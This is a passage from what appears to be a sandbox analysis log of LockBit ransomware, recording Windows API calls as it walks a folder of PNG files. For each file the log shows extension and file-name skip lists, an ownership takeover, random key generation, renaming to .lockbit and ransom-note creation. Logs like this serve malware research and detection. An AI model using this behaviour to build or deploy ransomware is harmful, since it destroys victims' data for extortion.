lpString2=".png") returned 1 [0080.594] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.594] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.594] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.594] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.594] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png.lockbit") returned 78 [0080.594] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotslightoverlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.595] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.595] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.595] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.595] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.595] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.596] RtlFreeAnsiString (AnsiString="\\") [0080.596] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.596] malloc (_Size=0x200) returned 0x77d800 [0080.596] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.596] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.596] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.596] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.597] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.597] CloseHandle (hObject=0x3a0) returned 1 [0080.597] free (_Block=0x77d800) [0080.597] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotslightoverlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.597] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.597] malloc (_Size=0x40068) returned 0x1ff1e60 [0080.597] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4669) returned 1 [0080.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.598] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0080.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0080.599] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.631] malloc (_Size=0xb2) returned 0x77d800 [0080.631] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb2, FileInformationClass=0xa) returned 0x0 [0080.632] free (_Block=0x77d800) [0080.632] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.632] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.632] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.632] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f12724e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f12724e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6794, dwReserved0=0x0, dwReserved1=0x0, cFileName="full.png", cAlternateFileName="")) returned 1 [0080.632] lstrcmpiW (lpString1=".", lpString2="full.png") returned -1 [0080.632] lstrcmpiW (lpString1="..", lpString2="full.png") returned -1 [0080.632] PathFindExtensionW (pszPath="full.png") returned=".png" [0080.633] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.633] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.633] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.634] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.634] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.634] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.634] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.634] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.634] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.634] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.634] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.635] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.635] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.635] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.635] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="full.png") returned 1 [0080.635] lstrcmpiW (lpString1="ntldr", lpString2="full.png") returned 1 [0080.636] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="full.png") returned 1 [0080.636] lstrcmpiW (lpString1="bootsect.bak", lpString2="full.png") returned -1 [0080.636] lstrcmpiW (lpString1="autorun.inf", lpString2="full.png") returned -1 [0080.636] lstrcmpiW (lpString1="thumbs.db", lpString2="full.png") returned 1 [0080.636] lstrcmpiW (lpString1="iconcache.db", lpString2="full.png") returned 1 [0080.636] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.636] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png") returned=".png" [0080.636] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.636] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.636] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.636] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.636] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.636] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.636] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.636] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.636] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.637] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.637] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.637] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.637] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.637] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.637] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.638] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.638] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.638] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png.lockbit") returned 66 [0080.638] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\full.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.642] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.643] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.643] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.643] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.644] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.644] RtlFreeAnsiString (AnsiString="\\") [0080.644] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0080.644] malloc (_Size=0x200) returned 0x77d800 [0080.644] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.644] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.644] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.644] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.645] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.645] CloseHandle (hObject=0x3c0) returned 1 [0080.645] free (_Block=0x77d800) [0080.645] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\full.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.645] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.646] malloc (_Size=0x40068) returned 0x3d70048 [0080.646] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=26516) returned 1 [0080.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.647] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.652] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.652] malloc (_Size=0x9a) returned 0x77d800 [0080.652] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0x9a, FileInformationClass=0xa) returned 0x0 [0080.652] free (_Block=0x77d800) [0080.652] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.652] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.652] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.653] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1bf7c2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1bf7c2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0080.653] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.653] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.653] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0080.653] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.653] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.653] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.654] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.654] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.654] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.654] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.654] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.654] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.654] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.654] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.654] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.654] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.654] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.655] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.655] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.655] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.655] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.655] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.655] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.655] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0080.655] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0080.655] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0080.655] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.655] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.656] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0080.656] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.656] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.656] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned=".png" [0080.656] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.656] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.656] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.656] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.657] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.657] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.657] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.657] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.657] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.657] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.657] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.657] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.657] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png.lockbit") returned 90 [0080.657] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.661] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.661] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.661] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.662] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.662] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.662] RtlFreeAnsiString (AnsiString="\\") [0080.662] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0080.662] malloc (_Size=0x200) returned 0x77d800 [0080.662] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.662] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.662] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, 